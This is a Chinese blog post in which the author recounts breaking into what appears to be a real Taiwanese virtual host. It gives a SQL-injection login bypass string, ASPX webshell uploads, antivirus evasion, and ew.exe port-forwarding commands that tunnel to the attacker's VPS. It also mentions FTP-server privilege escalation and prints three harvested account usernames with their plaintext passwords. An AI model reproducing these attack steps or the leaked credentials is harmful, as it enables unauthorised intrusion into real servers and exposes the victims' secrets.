原文:小记:台湾某虚拟主机

下面我先照着原文操作一遍。

emmmmmmm~~~~

I 拿Webshell

  万能密码是:'or'1'='1,,这个密码是我从Silic以前的文章找到,我发现他们这些大牛总是可以什么万能密码啊,什么弱口令进去的。当然,按照理论,她这个可以通过分析登陆后台登陆文件来获取绕过后台验证的密码。
 嗯,上传了2个Aspx的大马,打开发现一片空白,.net版本问题?换了一句话上去,就可以了。

进去之后还发现Silic的粉丝一个,应该是逗比,留下了个工具。
2018/05/14 上午 11:18 381,893 mimikatz_trunk.zip

II 转发提权

根据大神的思路是要转发的,我又比较喜欢大平台工具,掏出我的Cobalt Strike的服务端冲上去,发现被杀了,然后就发现原文里面的ESET,就是ESET NOD32 Antivirus。这就是为什么人家是大牛而我是菜狗子的原因,人家上去先去Program Files文件夹再配合tasklist看看安装了什么软件,有无杀软。这个时候就要找免杀的转发工具了,难道就剩下reDuh?我决定试试其他的。ew是不被杀的,果然对天朝的大神出品的新鲜货追杀还没有到位。

转发:

Webshell执行:c:\recycler\ew.exe -s lcx_slave -d <My VPS IP> -e 8080 -f 127.0.0.1 -g 8021
VPS执行:ew -s lcx_listen -l 1081 -e 8080

学习了一下Gene6 FTP Server的提权,之前一直都没有遇到过。
同样的姿势转发3389。进去操作了一下。发现ping不到其他的任何一个C段的IP。

III 捉密码 or Hash

一般来说我都是直接上Cobalt Strike去做信息收集的,但是这个有杀软,关键没有Powershell,我的免杀姿势多数都是来源cate4cafe对的Powershell各种操作。所以只能用曾经想用却没有用上的wce,发现没有卵用,就想用QuarksPwDump,突然看到从Silic下载的getpass,嗯我看他们好像都用这个,我也试试,果然捉到了。更多请看:获取用户hash的姿势

UserName: jimlai
LogonDomain: EC04
password: a12345@

UserName: Apache
LogonDomain: EC04
password: ApacheA!

UserName: IUSR_EC04
LogonDomain: EC04
password: /4w(50v{UiBx?i

发表评论

电子邮件地址不会被公开。 必填项已用*标注